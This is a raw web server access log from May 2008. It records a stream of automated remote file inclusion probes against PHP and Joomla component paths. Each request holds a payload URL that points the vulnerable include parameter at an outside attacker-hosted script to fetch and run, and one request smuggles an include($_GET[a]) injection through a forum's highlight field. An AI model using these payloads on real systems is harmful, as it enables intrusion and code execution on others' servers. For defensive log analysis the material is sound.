206.221.191.24 - - [06/May/2008:10:24:57 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
206.221.191.24 - - [06/May/2008:10:25:04 -0700] "GET //cal//tools/send_reminders.php?includedir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
206.221.191.24 - - [06/May/2008:10:25:05 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
61.63.9.163 - - [06/May/2008:10:25:56 -0700] "GET /logs/access_080118.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.arai.web.id/bleh/bot_site.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
65.98.95.186 - - [06/May/2008:10:25:57 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.226.79.133 - - [06/May/2008:10:25:58 -0700] "GET /index2.php?x=http://www.dlkownz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.63.9.163 - - [06/May/2008:10:26:17 -0700] "GET /logs/access_080111.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.arai.web.id/bleh/bot_site.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.115.110.64 - - [06/May/2008:10:26:19 -0700] "GET /logs/access_080315.log//account.php?action=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.110.64 - - [06/May/2008:10:26:19 -0700] "GET /logs//account.php?action=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.98.95.186 - - [06/May/2008:10:26:37 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [06/May/2008:10:26:40 -0700] "GET /logs/access_071218.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [06/May/2008:10:26:40 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:10:26:40 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:10:26:40 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
65.98.95.186 - - [06/May/2008:10:26:45 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [06/May/2008:10:26:49 -0700] "GET /logs/access_071218.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [06/May/2008:10:26:49 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [06/May/2008:10:26:50 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.115.34.17 - - [06/May/2008:10:26:52 -0700] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.grupslactancia.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.115.34.17 - - [06/May/2008:10:26:53 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.grupslactancia.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.115.34.17 - - [06/May/2008:10:26:53 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.grupslactancia.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
211.115.110.64 - - [06/May/2008:10:27:22 -0700] "GET /logs/access_080119.log//account.php?action=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.115.34.17 - - [06/May/2008:10:27:27 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://ces.afrohost.net/media/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
208.115.34.17 - - [06/May/2008:10:27:27 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://ces.afrohost.net/media/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
142.150.1.9 - - [06/May/2008:10:27:29 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.38.12.93 - - [06/May/2008:10:27:55 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
142.150.1.9 - - [06/May/2008:10:28:19 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.98.95.186 - - [06/May/2008:10:28:27 -0700] "GET /logs/access_071224.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
142.150.1.9 - - [06/May/2008:10:28:27 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
142.150.1.9 - - [06/May/2008:10:28:30 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.98.95.186 - - [06/May/2008:10:28:30 -0700] "GET /logs/access_071224.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
218.38.12.93 - - [06/May/2008:10:28:56 -0700] "GET /logs/access_080131.log/main.php?pagina=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.12.93 - - [06/May/2008:10:28:56 -0700] "GET /logs/main.php?pagina=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.172.175.130 - - [06/May/2008:10:29:06 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
217.172.175.130 - - [06/May/2008:10:29:06 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [06/May/2008:10:29:17 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [06/May/2008:10:29:17 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
72.18.152.168 - - [06/May/2008:10:29:18 -0700] "GET /logs/scripts.log/shop.pl/page=http://bubbleface.bu.funpic.de/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.18.152.168 - - [06/May/2008:10:29:27 -0700] "GET /logs/shop.pl/page=http://bubbleface.bu.funpic.de/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.18.152.168 - - [06/May/2008:10:29:28 -0700] "GET /shop.pl/page=http://bubbleface.bu.funpic.de/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.221.191.24 - - [06/May/2008:10:29:30 -0700] "GET /logs/access_080321.log//radio//playing.php/common/db.php?commonpath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
206.221.191.24 - - [06/May/2008:10:29:30 -0700] "GET //radio//playing.php/common/db.php?commonpath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
206.221.191.24 - - [06/May/2008:10:29:31 -0700] "GET /logs//radio//playing.php/common/db.php?commonpath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
206.221.191.24 - - [06/May/2008:10:29:31 -0700] "GET /logs/access_080324.log//radio//playing.php/common/db.php?commonpath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
196.35.158.180 - - [06/May/2008:10:29:32 -0700] "GET /logs/access_080315.log//common/db.php?commonpath=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.192.241.50 - - [06/May/2008:10:29:33 -0700] "GET /logs/access_080218.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.192.241.50 - - [06/May/2008:10:29:33 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.192.241.50 - - [06/May/2008:10:29:34 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
196.35.158.181 - - [06/May/2008:10:29:37 -0700] "GET //common/db.php?commonpath=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
196.35.158.181 - - [06/May/2008:10:29:49 -0700] "GET /logs//common/db.php?commonpath=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.113.24.154 - - [06/May/2008:10:29:51 -0700] "GET /logs/access_071218.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [06/May/2008:10:29:51 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [06/May/2008:10:29:51 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
206.221.191.24 - - [06/May/2008:10:30:00 -0700] "GET //radio//playing.php/common/db.php?commonpath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
196.35.158.180 - - [06/May/2008:10:30:02 -0700] "GET /logs/access.log//common/db.php?commonpath=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
208.116.44.68 - - [06/May/2008:10:30:03 -0700] "GET /logs/access_080225.log//oneadmin/calendar/samplecalendar.php?path[docroot]=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
217.230.251.145 - - [06/May/2008:10:30:06 -0700] "GET //index.php?option=com_mtree&task=listalpha&http://allblackberry.com/install/id.txt???? HTTP/1.1" 200 11606 "-" "libwww-perl/5.812" "www.dmulk.com"
212.113.24.154 - - [06/May/2008:10:30:14 -0700] "GET /logs/access_071218.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [06/May/2008:10:30:14 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [06/May/2008:10:30:14 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
208.226.79.133 - - [06/May/2008:10:31:12 -0700] "GET /logs/access_080216.log/main.php?x=http://www.dlkownz.com/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [06/May/2008:10:31:12 -0700] "GET /main.php?x=http://www.dlkownz.com/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [06/May/2008:10:31:12 -0700] "GET /logs/main.php?x=http://www.dlkownz.com/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
142.150.1.9 - - [06/May/2008:10:31:15 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.116.174.9 - - [06/May/2008:10:32:23 -0700] "GET /logs/access_080311.log//modules/agendax/addevent.inc.php?agendax_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [06/May/2008:10:32:23 -0700] "GET /logs/access_080311.log//modules/agendax/addevent.inc.php?agendax_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.241.215.166 - - [06/May/2008:10:32:34 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://thetestingcompany.com//cache/rotest.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
64.38.46.234 - - [06/May/2008:10:32:34 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.welkominfo.co.za/lapa/bo.do? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
212.241.215.166 - - [06/May/2008:10:32:35 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://thetestingcompany.com//cache/rotest.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
64.38.46.234 - - [06/May/2008:10:32:36 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.welkominfo.co.za/lapa/bo.do? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
212.71.28.84 - - [06/May/2008:10:32:49 -0700] "GET /logs/access_080218.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.71.28.84 - - [06/May/2008:10:32:50 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.71.28.84 - - [06/May/2008:10:32:50 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
221.143.49.246 - - [06/May/2008:10:33:01 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.192.241.50 - - [06/May/2008:10:33:41 -0700] "GET /logs/access_080130.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.192.241.50 - - [06/May/2008:10:33:56 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.192.241.50 - - [06/May/2008:10:33:57 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
206.221.191.24 - - [06/May/2008:10:34:28 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.811" "www.dmulk.com"
203.130.242.135 - - [06/May/2008:10:34:53 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.geocities.com/k4l0nkicc/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [06/May/2008:10:34:53 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.geocities.com/k4l0nkicc/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [06/May/2008:10:34:53 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.geocities.com/k4l0nkicc/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [06/May/2008:10:34:53 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.geocities.com/k4l0nkicc/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [06/May/2008:10:34:54 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.geocities.com/k4l0nkicc/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [06/May/2008:10:34:54 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.geocities.com/k4l0nkicc/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.188.9.222 - - [06/May/2008:10:35:05 -0700] "GET /logs/index.php?configFile=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.188.9.222 - - [06/May/2008:10:35:14 -0700] "GET /index.php?configFile=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
213.193.215.56 - - [06/May/2008:10:35:17 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/fitra.yulia/mulus.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.18.47 - - [06/May/2008:10:35:21 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.insertcoinhere.de//language/lang_english/.../contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
85.214.18.47 - - [06/May/2008:10:35:21 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.insertcoinhere.de//language/lang_english/.../contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
213.192.241.50 - - [06/May/2008:10:35:22 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.192.241.50 - - [06/May/2008:10:35:22 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.192.241.50 - - [06/May/2008:10:35:42 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.192.241.50 - - [06/May/2008:10:35:42 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.192.241.50 - - [06/May/2008:10:35:43 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.128.80.102 - - [06/May/2008:10:35:55 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.102 - - [06/May/2008:10:35:56 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.192.241.50 - - [06/May/2008:10:35:56 -0700] "GET /logs/access_080312.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.222.31.133 - - [06/May/2008:10:35:57 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.robosborn.com/blog/wp-content/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.222.31.133 - - [06/May/2008:10:36:02 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.robosborn.com/blog/wp-content/id.txt? HTTP/1.1" 200 4139 "-" "libwww-perl/5.803" "www.dmulk.com"
83.222.31.133 - - [06/May/2008:10:36:03 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.robosborn.com/blog/wp-content/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.113.24.154 - - [06/May/2008:10:36:28 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [06/May/2008:10:36:29 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:10:36:32 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:10:36:32 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
195.34.78.106 - - [06/May/2008:10:37:00 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://edgcs.com/store/administrator/components/com_jcs/views/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.250.148.44 - - [06/May/2008:10:37:36 -0700] "GET /logs/access_080308.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.250.148.44 - - [06/May/2008:10:37:36 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.250.148.44 - - [06/May/2008:10:37:36 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:10:38:01 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
64.128.80.102 - - [06/May/2008:10:38:05 -0700] "GET /logs/access_080118.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.102 - - [06/May/2008:10:38:05 -0700] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.102 - - [06/May/2008:10:38:05 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.214.56.123 - - [06/May/2008:10:38:07 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.specterworld.net/elmasry/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.56.123 - - [06/May/2008:10:38:07 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.specterworld.net/elmasry/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.56.123 - - [06/May/2008:10:38:08 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.specterworld.net/elmasry/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
